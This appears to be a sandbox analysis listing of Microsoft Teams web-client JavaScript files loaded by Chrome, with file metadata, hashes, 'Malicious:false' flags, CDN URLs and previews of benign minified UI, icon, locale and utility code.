                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[421318],{851706:(e,t,n)=>{n.d(t,{E:()=>V});var r=n(513432),o=n(48374),a=n(883027),i=n(602835),l=n(691478),u=n(164093),c=n(716300),s=n(250452),d=n(478304),f=n(31152),v=n(35871),b=n(103735);const m=(0,b.D)("r6pzz3z",null),p=(0,b.D)("r144vlu9",null);var y=n(115170),h=n(123082);const g=[{opacity:0},{opacity:1}],E=(0,y.$)({enter:{keyframes:g,easing:h.TV.curveLinear,duration:h.TV.durationGentle},exit:{keyframes:[...g].reverse(),easing:h.TV.curveLinear,duration:h.TV.durationGentle}});var k=n(712944);const D=(e,t)=>{const n=(0,k.Z)(),b=(0,f.e4)((e=>e.modalType)),y=(0,f.e4)((e=>e.isNestedDialog)),h=(0,f.e4)((e=>e.modalAttributes)),g=(0,f.e4)((e=>e.dialogRef)),D=(0,f.e4)((e=>e.requestOpenChange)),w=(0,f.e4)((e=>e.dialogTitleId)),C=(0,f.e4)((e=>e.open)),L=(0,i.D)((t=>{var n,r;(0,l.g)(e.backdrop)&&(null===(n=(r=e.backdrop).onClick)||void 0===n||n.call(r,t));"modal"!==b||t.isDefaultPreven
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4986)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):5094
                                                                                                                                                                                                                          Entropy (8bit):5.51636181102733
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:zpBCu/dgCYkjwLiTSbTkiwO1z7zFrbl4tZDrEshgPgEeLQM/YLFu4a:zpmmjwLiTSbTkiF5PKDrEVIEeUUYxun
                                                                                                                                                                                                                          MD5:B65450E5E3BDED5E0DF059CF41E27EF8
                                                                                                                                                                                                                          SHA1:C5A12EAF609A083B7542CD3AC429E550665CAB53
                                                                                                                                                                                                                          SHA-256:8AE92D7478043DA693389A9C139FCDBE4FED242CD318BB10EB645BF0F4DCD548
                                                                                                                                                                                                                          SHA-512:051B0BCD140770FF42CCD224F4905CFA55422008AB5DA3A714C469CD4BFB9B3D61017FCAB41AA57635E74325D7439E560E171CE562503A9B4D3F88B57B58089F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[986559],{926751:(e,n,t)=>{var r;t.d(n,{B:()=>r}),function(e){e.AuthFailed="AuthFailed",e.AuthResolveFailed="AuthResolveFailed",e.BaseUrlFailedToResolve="BaseUrlFailedToResolve",e.BaseUrlTimeout="BaseUrlTimeout",e.CustomTelemetryFailed="CustomTelemetryFailed",e.FailedToFetch="FailedToFetch",e.InvalidCancellationToken="InvalidCancellationToken",e.InvalidParameters="Invalid pararameters",e.InvalidUrl="InvalidUrl",e.ModelFailedToInitialize="ModelFailedToInitialize",e.ModelTimeOut="ModelTimeOut",e.NotImplemented="NotImplemented",e.RejectHttpError="RejectHttpError",e.RequestCancelled="RequestCancelled",e.RequireStatusFailed="RequireStatusFailed",e.TimedOut="TimedOut",e.TransformFailed="TransformFailed"}(r||(r={}))},72909:(e,n,t)=>{function r(e){return new Promise(((n,t)=>{e<0?t(new Error("negative timeout")):setTimeout(n,e)}))}t.d(n,{y:()=>r})},355515:(e,n,t)=>{t.d(n,{GQ:()=>o,E2:(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (31325)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):31431
                                                                                                                                                                                                                          Entropy (8bit):5.399135626691903
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:tdO5w+pZxoNkmVh75ihyMxceZAYZeYSZeQGoIzNm2MzebMYz8zWrzdSLO:kOde4fKRmgca
                                                                                                                                                                                                                          MD5:96117FF359F7BB74C8E029A8DE7A0418
                                                                                                                                                                                                                          SHA1:78491116F2639C9BA250FFBF22BF575C6FFE8260
                                                                                                                                                                                                                          SHA-256:35A9D6F5CCB83F45FC664044E841FC7D3CA0859984D57C32D7CCF33E02763815
                                                                                                                                                                                                                          SHA-512:335AF97209D9DBA5281FFDFC30673946948D88974FF90F8533356DB491F3ED20EC4C6350577ABDF88A105011434913E33792231855D0FBD173246EEE6D25130C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[138792],{51304:()=>{!function(){var e=["user-blocking","user-visible","background"];class r{constructor(){this.channel_=new MessageChannel,this.sendPort_=this.channel_.port2,this.messages_={},this.nextMessageHandle_=1,this.channel_.port1.onmessage=e=>this.onMessageReceived_(e)}queueCallback(e){var r=this.nextMessageHandle_++;return this.messages_[r]=e,this.sendPort_.postMessage(r),r}cancelCallback(e){delete this.messages_[e]}onMessageReceived_(e){var r=e.data;if(r in this.messages_){var t=this.messages_[r];delete this.messages_[r],t()}}}function t(){return t.instance_||(t.instance_=new r),t.instance_}class i{constructor(e,r,t){void 0===t&&(t=0),this.callback_=e,this.callbackType_=null,this.handle_=null,this.canceled_=!1,this.schedule_(r,t)}isIdleCallback(){return 0===this.callbackType_}cancel(){if(!this.canceled_)switch(this.canceled_=!0,this.callbackType_){case 0:cancelIdleCallback(this.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (51963)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):52070
                                                                                                                                                                                                                          Entropy (8bit):5.432819376714012
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:XThOnPn9ptfsLRuSIpWAunOXff4VgsLA6Ch/dY5psGEAB9F8hH9dqH9gnoYkCIKA:y9ptfMuSIpWAunafgukt58hHfjh0jR
                                                                                                                                                                                                                          MD5:408275248AC2B22A149FC9ADFA8A253E
                                                                                                                                                                                                                          SHA1:3013438C6B14A0D39F8DAB60ED2BBB3E7791CF83
                                                                                                                                                                                                                          SHA-256:9AA2ECD7B6595D53D99A0557C011E1BB5419774865263D364AAD79959CFC8362
                                                                                                                                                                                                                          SHA-512:6FE0950884F32BB2AEB96848D65495F2A71FED4B413A30307893EE0777F4AA2A0B67D6C29BD29DF175FBF5FE845F8241DC295A25FBDDBE56F84E8B3BCCA4867F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/22826-319fcd504b4f79a4.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[22826],{277362:(e,t,n)=>{n.d(t,{p:()=>a});const a={AcceptSharedChannelInvitationDialog:"AcceptSharedChannelInvitationDialog",AccessibilitySettingsPanelButton:"AccessibilitySettingsPanelButton",AccountLocaleChangeNotificationJob:"AccountLocaleChangeNotificationJob",AccountSelectionDialog:"AccountSelectionDialog",ActivityFeed:"ActivityFeed",ActivityFeedBellClick:"ActivityFeedBellClick",ActivitySlices:"ActivitySlices",ActivitySlicesPopOutButton:"ActivitySlicesPopOutButton",AcceptInvitationFromAccountAndSettingPage:"AcceptInvitationFromAccountAndSettingPage",AdaptiveCardInvokeButton:"AdaptiveCardInvokeButton",AddAccountFromButton:"AddAccountFromButton",AddAccountFromMeMenu:"AddAccountFromMeMenu",AddAccountFromSettings:"AddAccountFromSettings",AddAccountFromSignoutDialog:"AddAccountFromSignoutDialog",AddCloudStorageFolderDialog:"AddCloudStorageFolderDialog",AddGoogleContactsSyncEr
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (8753)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):8861
                                                                                                                                                                                                                          Entropy (8bit):4.889317897367703
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:9TX7H7X6xHIWlN+Q4fN+886lp2SXW1BoQDScNvHILSzLtYr8k:9b7Hj6xP4d86I1BoYScNvMSzA
                                                                                                                                                                                                                          MD5:CB840FABB77752725FBBBA7CE3B7D07C
                                                                                                                                                                                                                          SHA1:812ECBAE9B9B2FB5A26A39C53CAE1F66B7D8EB56
                                                                                                                                                                                                                          SHA-256:693E4EE76589A587C66DD4CE12E0ECE09C39306A83F651CF08D789AD8CD2CB87
                                                                                                                                                                                                                          SHA-512:D32F72EBD2FE576331C593C77D682E784596325BFD7BE19FCF9DD0761A0908BF88450BA08DB3B3A02F21377F7B8423361293FA2437D16F42CE093C64732B860C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[232042],{749978:(C,a,l)=>{l.d(a,{o:()=>s});var e=l(957032);const s=(0,l(485529).Ke)({svg:({classes:C})=>(0,e.Y)("svg",{role:"presentation",viewBox:"0 0 32 32",className:C.svg,children:[(0,e.Y)("path",{fill:"#FFF",d:"M28.293 8 24 3.707V7.5c0 .275.225.5.5.5h3.793z"}),(0,e.Y)("g",{fill:"#FFF",children:[(0,e.Y)("path",{d:"M24.5 9c-.827 0-1.5-.673-1.5-1.5V3H9.5c-.275 0-.5.225-.5.5v5.56A9.02 9.02 0 0 1 10 9c4.963 0 9 4.037 9 9s-4.037 9-9 9H9v1.5c0 .275.225.5.5.5h19c.275 0 .5-.225.5-.5V9h-4.5z"}),(0,e.Y)("path",{d:"M24 3.707 28.293 8H24.5a.501.501 0 0 1-.5-.5V3.707z"})]}),(0,e.Y)("path",{opacity:".64",fill:"#605E5C",d:"m29.56 7.854-5.414-5.415A1.51 1.51 0 0 0 23.086 2H9.5C8.673 2 8 2.673 8 3.5v5.732c.328-.075.66-.135 1-.173V3.5c0-.275.225-.5.5-.5H23v4.5c0 .827.673 1.5 1.5 1.5H29v19.5c0 .275-.225.5-.5.5h-19a.501.501 0 0 1-.5-.5V27H8v1.5c0 .827.673 1.5 1.5 1.5h19c.827 0 1.5-.673 1.5-1
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65513), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):450575
                                                                                                                                                                                                                          Entropy (8bit):4.738673450934081
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:ABOqzit4k1ed23gkfpJW7yULUCpgcSylqfSlUi:ABvFkfpE1L
                                                                                                                                                                                                                          MD5:FACD97157A01E906C8CB400A58EA09A9
                                                                                                                                                                                                                          SHA1:33B478322ED8FFCE14CE1B6EBE6486DE5FF3BCE5
                                                                                                                                                                                                                          SHA-256:147C29E9E79D3671ECE805CFD53774C50DC045F7248D29CA906BF1705F17BDDC
                                                                                                                                                                                                                          SHA-512:C5D724A9565145F17363CC193538F569466C96B92CC52FF83CE55C3AB3DBE51C7C3A6E9DC17EC95B855D214E1BB1491E398F74FE74FD5C4FF845D581FD3DD778
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/calling-locale-en-us-314542ee1dfe6bf0.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[413749],{114623:(e,t,a)=>{a.r(t),a.d(t,{default:()=>i});const i={namespace:"calling",locale:"en-us",translations:{aa_permission_error_header_description:"You are no longer authorized for this auto attendant",acccepted_elsewhere_call_timeline_description_label:"Answered by {{acceptedElsewhereParticipantName}}",active_in_call_with:"is in call with {{caller}}",activity_date_today:"Today",add_a_room_close_button:"Close",add_a_room_enable_bluetooth_subtitle:"Turn on Bluetooth to automatically detect nearby rooms.",add_a_room_no_rooms_text:"Didn't find any Teams rooms nearby",add_a_room_other_suggestions:"Other Suggestions",add_a_room_screen_title:"Nearby Rooms",add_a_room_searching_text:"Searching for nearby Teams Rooms...",add_a_room_title:"Add a room",add_address:"Add",add_address_aria_label:"Add location",add_emergency_address:"Add",add_menu_option:"Add new option",add_new_addr
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (21424)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):21532
                                                                                                                                                                                                                          Entropy (8bit):5.515475146072575
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:Z26FtV+V/B8eYTOr05ycr2m25YGkRkUaPLG9KTCLITX25YoqSisHDLuwOz2zCnC9:k6Ft6DAy05ycam25jCSaQCUTX25bqSZD
                                                                                                                                                                                                                          MD5:A635CC58B3B71104A5BB2E3EB03D1E9F
                                                                                                                                                                                                                          SHA1:16300799F5B845839A6526A26BCB045BCE3B9393
                                                                                                                                                                                                                          SHA-256:56ABB9053A8E30042F9A25D00C2AD21AB9343F37FC22A5A478A93C0B743457BA
                                                                                                                                                                                                                          SHA-512:F30AAD92B56739C2CACAF41541CDA656BF049BCB946574CFA6E0A5CD623944427214B6EEA210AE4321376ED1951CE6F3EAA0B33E4031C06061181E79F939CD8D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/471294-5c6c36c6a7d801e5.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[471294],{998783:(e,t,n)=>{n.d(t,{S:()=>F});var r=n(513432),o=n(733071),a=n(589256),i=n(531389),l=n(411947),s=n(164093),c=n(602835),f=n(478304),u=n(716300),d=n(750818),p=n(119068),v=n(499319),m=n(483851),g=n(762612);var b=n(644525),h=n(854130);var B=n(103735),y=n(965804),q=n(526521);const w="fui-Checkbox",j="fui-Checkbox__label",k="fui-Checkbox__input",z="fui-Checkbox__indicator",x=(0,B.D)("r1q22k1j","r18ze4k2"),O=(0,y.O)({unchecked:{Bi91k9c:"f3p8bqa",pv5h1i:"fium13f",lj723h:"f1r2dosr",Hnthvo:"f1729es6"},checked:{sj55zd:"f19n0e5",wkncrt:"f35ds98",zxk7z7:"f12mnkne",Hmsnfy:"fei9a8h",e6czan:"fix56y3",pv5h1i:"f1bcv2js",qbydtz:"f7dr4go",Hnthvo:"f1r5cpua"},mixed:{sj55zd:"f19n0e5",Hmsnfy:"f1l27tf0",zxk7z7:"fcilktj",pv5h1i:"f1lphd54",Bunfa6h:"f1obkvq7",Hnthvo:"f2gmbuh",B15ykmv:"f1oy4fa1"},disabled:{Bceei9c:"f158kwzp",sj55zd:"f1s2aq7o",Hmsnfy:"f1w7mfl5",zxk7z7:"fcoafq6",Bbusuzp:"f1dcs8
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (19951)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):20058
                                                                                                                                                                                                                          Entropy (8bit):5.301484485075663
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:UOmMRB7DsuJmOv7+ijeoTfJoINLEqF+5BGk:fbsVqtjPThorVJ
                                                                                                                                                                                                                          MD5:34407BE2AFA1792CDB44C58E48ABFB23
                                                                                                                                                                                                                          SHA1:C9AC25CF2AB6163F1C8288A3E32E669785CD4021
                                                                                                                                                                                                                          SHA-256:F766D7CA6D6CBC1572B1DA8B46566A26B1BAFC66487193886FC2CD9190E42944
                                                                                                                                                                                                                          SHA-512:570FD69E553A4E228D9DC003A204F91D183A9801AB0EE9A99D696B1E7808B31F312453DA26704A36D794BD84E7A834BFD36C3A6E5DFD7C63F4E128DE9A2821A3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/19528-b6fec175b219cd79.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[19528],{408501:r=>{r.exports=function(r,t,n){switch(n.length){case 0:return r.call(t);case 1:return r.call(t,n[0]);case 2:return r.call(t,n[0],n[1]);case 3:return r.call(t,n[0],n[1],n[2])}return r.apply(t,n)}},816349:r=>{r.exports=function(r,t){for(var n=-1,e=null==r?0:r.length;++n<e&&!1!==t(r[n],n,r););return r}},44953:(r,t,n)=>{var e=n(939767);r.exports=function(r,t){return!!(null==r?0:r.length)&&e(r,t,0)>-1}},875597:r=>{r.exports=function(r,t,n){for(var e=-1,o=null==r?0:r.length;++e<o;)if(n(t,r[e]))return!0;return!1}},816920:r=>{r.exports=function(r,t){for(var n=-1,e=null==r?0:r.length,o=Array(e);++n<e;)o[n]=t(r[n],n,r);return o}},698078:r=>{r.exports=function(r){return r.split("")}},907001:(r,t,n)=>{var e=n(314172),o=n(484636);r.exports=function(r,t,n){(void 0!==n&&!o(r[t],n)||void 0===n&&!(t in r))&&e(r,t,n)}},872791:(r,t,n)=>{var e=n(314172),o=n(484636),u=Object.prototype.hasOwnProp
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (762)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):870
                                                                                                                                                                                                                          Entropy (8bit):5.301211793639726
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:wp3sp38YKmDCex7DpbSHIo4OqoYVMcGOqolHixNSYbH:wp3sp37bCkvVk2qH
                                                                                                                                                                                                                          MD5:F12EA2701724109C363A74AF2EA3EA39
                                                                                                                                                                                                                          SHA1:DA31AFBF27568A376C8BE1B792C9372B31C2C4E9
                                                                                                                                                                                                                          SHA-256:0D8398F412E8E9C50053E27370BBFCC05728D5661835987D3838171434A602D8
                                                                                                                                                                                                                          SHA-512:BB5963F801DF116F9AB20799365BABF10C864CF14E1A82C1E9DD03C8C2364F4D6819598B7BB0D7191DE2D0D94137980CF6DF05079416373E66B55D733CF72CD4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[718583],{718583:(e,a,t)=>{t.d(a,{Z:()=>i});var s=t(513432),c=t(395225),l=t.n(c),n=t(485529),r=t(829289),i=(0,n.Ke)({svg:function(e){var a=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"0 0 16 16",className:a.svg},s.createElement("path",{className:l()(r.Q.outline,a.outlinePart),d:"M8,1A7,7,0,1,1,1,8,7.008,7.008,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"}),s.createElement("g",{className:l()(r.Q.filled,a.filledPart)},s.createElement("path",{d:"M8,1A7,7,0,1,1,1,8,7.008,7.008,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"}),s.createElement("circle",{cx:"8",cy:"8",r:"5"})))},displayName:"RadioButtonIcon"})}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/718583-24621dda8c5747d2.js.map
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65520), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):71376
                                                                                                                                                                                                                          Entropy (8bit):5.384960751161495
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:NA+42TMvsS+6ZDuPNlZVsqHbbeEty5EFwv4oWqDX/mSN/H8T7R1tM:p4sShZDacSFRoWqDX/mSN/H8T7R1tM
                                                                                                                                                                                                                          MD5:F3BA70937459B1C801D859B2EBEB3ACB
                                                                                                                                                                                                                          SHA1:1D153EF9FFB8FF824E9C40F74B9E1953D6497B73
                                                                                                                                                                                                                          SHA-256:AF70DE25B485721A15C05BF2A5DA0C7CC912B8A9A02AC000AA304A507E488171
                                                                                                                                                                                                                          SHA-512:90BB3978067903FCC4137D4AA1EEB4369C6EDD88C0BFCBBBE57876ACA2BA23AC446C24AA40F7DF3B1503B1DDE23B1D9230FD18BAC0345C5B83CD7F608DB336DD
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/834680-ec074dfe4008b640.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[834680,795423,390601,472903,173388,951007],{414214:(e,t,r)=>{r.d(t,{M:()=>o});var o=function(e){return{attributes:{dismissAction:{"aria-describedby":e.bodyId}}}}},182227:(e,t,r)=>{r.d(t,{K:()=>o});var o=function(){return{attributes:{root:{role:"img","aria-hidden":"true"}}}}},498255:(e,t,r)=>{r.d(t,{K:()=>a});var o=r(953543),n=r(504405),a=function(e){var t;return{attributes:{root:(t={"aria-checked":"mixed"===e.checked?"mixed":!!e.checked,"aria-disabled":e.disabled,role:"checkbox",tabIndex:0},t[n.P]=!0,t)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:o.ZG}]}}}}}},244211:(e,t,r)=>{r.d(t,{K:()=>c});var o=r(55543),n=r.n(o),a=r(76424),s=r.n(a),l=r(953543),i=r(928879),c=function(e){var t=(0,i.Z)(Object.assign({},e,{inline:!e.contextMenu}));return s()(t,{attributes:{trigger:Object.assign({},e.open&&{"aria-controls":e.menuId},e.open&&!e.contextMenu&&{"aria-expanded":"true
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (41594)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):41712
                                                                                                                                                                                                                          Entropy (8bit):5.29491411540647
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:4kqwbq1jw+8Thjo4i+I3h2Zixcer63Ns5qJKOw:4RwbqFuTCjIer69Jdw
                                                                                                                                                                                                                          MD5:F9D05C5CD421E615E84AA0595ACAA352
                                                                                                                                                                                                                          SHA1:DD1975343D52A1565C4BAFEF306729040FEA1C9B
                                                                                                                                                                                                                          SHA-256:B75C9801EC0811E358FFC023B1644C416F99808033F551F71E5E948FF785A5B1
                                                                                                                                                                                                                          SHA-512:AFD2EE8C0C3C5A7E688ACAA757881DD1F7912E63E6C95EA013CDE33F22956CD09B8811FD3432472ACA1C370BCB69B83420C651A040492E73157A3B69375A7BA4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/412417-b3da2627a5108e3b.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[412417],{975021:(e,t,n)=>{n.d(t,{$3:()=>s,or:()=>c,I6:()=>f,Xx:()=>d,Ui:()=>p,gk:()=>h,iJ:()=>v,T9:()=>m,d1:()=>y,mv:()=>g,cy:()=>b});var r=n(850734),i=n(813801),o=n(613995),a=n(401385),u=n(597309),s=Object.prototype.hasOwnProperty;function c(e,t){var n=e.__typename,r=e.id,i=e._id;if("string"==typeof n&&(t&&(t.keyObject=void 0!==r?{id:r}:void 0!==i?{_id:i}:void 0),void 0===r&&(r=i),void 0!==r))return"".concat(n,":").concat("number"==typeof r||"string"==typeof r?r:JSON.stringify(r))}var l={dataIdFromObject:c,addTypename:!0,resultCaching:!0,canonizeResults:!1};function f(e){return(0,r.o)(l,e)}function d(e){var t=e.canonizeResults;return void 0===t?l.canonizeResults:t}function p(e,t){return(0,i.A_)(t)?e.get(t.__ref,"__typename"):t&&t.__typename}var h=/^[_a-z][_0-9a-z]*/i;function v(e){var t=e.match(h);return t?t[0]:e}function m(e,t,n){return!!(0,o.U)(t)&&(b(t)?t.every((function(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (43863)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):43971
                                                                                                                                                                                                                          Entropy (8bit):5.219897273461165
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:gtXZGCUCr0VC2CGC6Cv+26CDCBCICTIg17CWtBIY7/2emocxjVY21CWrO:gVICUCgC2CGC6CWLCDCBCICTpCWjGji/
                                                                                                                                                                                                                          MD5:AADD07657CFD0C9AC39F067D6AA88900
                                                                                                                                                                                                                          SHA1:0A829E66BE650CF343D705B4022A6F605FAF9928
                                                                                                                                                                                                                          SHA-256:8CBEF87A094C8C473ACE6DE5897EB9E4B524EDBDAB60F4EE5447C6B06C34DE37
                                                                                                                                                                                                                          SHA-512:FAEA6697A8DBDE2D51604DCE7E1C8564D300CC60B397A7D8B5C63A736DBF6ADC2290B9B4EE51FA93EA6A072A61F78E4C33766E52B8C7AFC0A48B114F2AECF343
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[137137],{414250:(e,t,l)=>{l.d(t,{g:()=>C});var a=l(513432),C=(0,l(485529).Ke)({svg:function(e){var t=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"0 0 32 32",className:t.svg},a.createElement("path",{d:"M9.5 29H28.5C28.775 29 29 28.775 29 28.5V9H24.5C23.673 9 23 8.327 23 7.5V3H9.5C9.225 3 9 3.225 9 3.5V28.5C9 28.775 9.225 29 9.5 29Z",fill:"white"}),a.createElement("path",{d:"M28.293 8.00003L24 3.70703V7.50003C24 7.77503 24.225 8.00003 24.5 8.00003H28.293Z",fill:"white"}),a.createElement("path",{opacity:"0.64",fillRule:"evenodd",clipRule:"evenodd",d:"M29.56 7.854L24.146 2.439C23.8642 2.15891 23.4833 2.00117 23.086 2H9.5C8.673 2 8 2.673 8 3.5V28.5C8 29.327 8.673 30 9.5 30H28.5C29.327 30 30 29.327 30 28.5V8.914C30 8.514 29.844 8.137 29.56 7.854ZM24 3.707L28.293 8H24.5C24.2241 7.99945 24.0005 7.77591 24 7.5V3.707ZM9.5 29H28.5C28.775 29 29 2
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (19613)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):19721
                                                                                                                                                                                                                          Entropy (8bit):5.343521820857181
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:i4A/8Siva3/i3RrXxLXY0SQw2XMaeZhrDPuTFi9u5yHfdUsYUnseOrQbDz:Dvi/inXBXMTZpURdS9z
                                                                                                                                                                                                                          MD5:C86832ABA19643DA044A61F0121FC06A
                                                                                                                                                                                                                          SHA1:A44017135CF79D42AAE4E617DD23EB82581DAEA2
                                                                                                                                                                                                                          SHA-256:8835A3F9BF4B64E64A7A9ED20D3C9E5EF3B791C3C80776D644CDD63DE9AA4558
                                                                                                                                                                                                                          SHA-512:67E319B01367F2924520272DF1C9A54EB6D483E6CF064561FE0E4B6C2C55779434C6D574C5B624EFF81D32BDC5A415759B8FE477E7605187145BEC38F747E941
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/914945-cba296ef334bdcfb.js
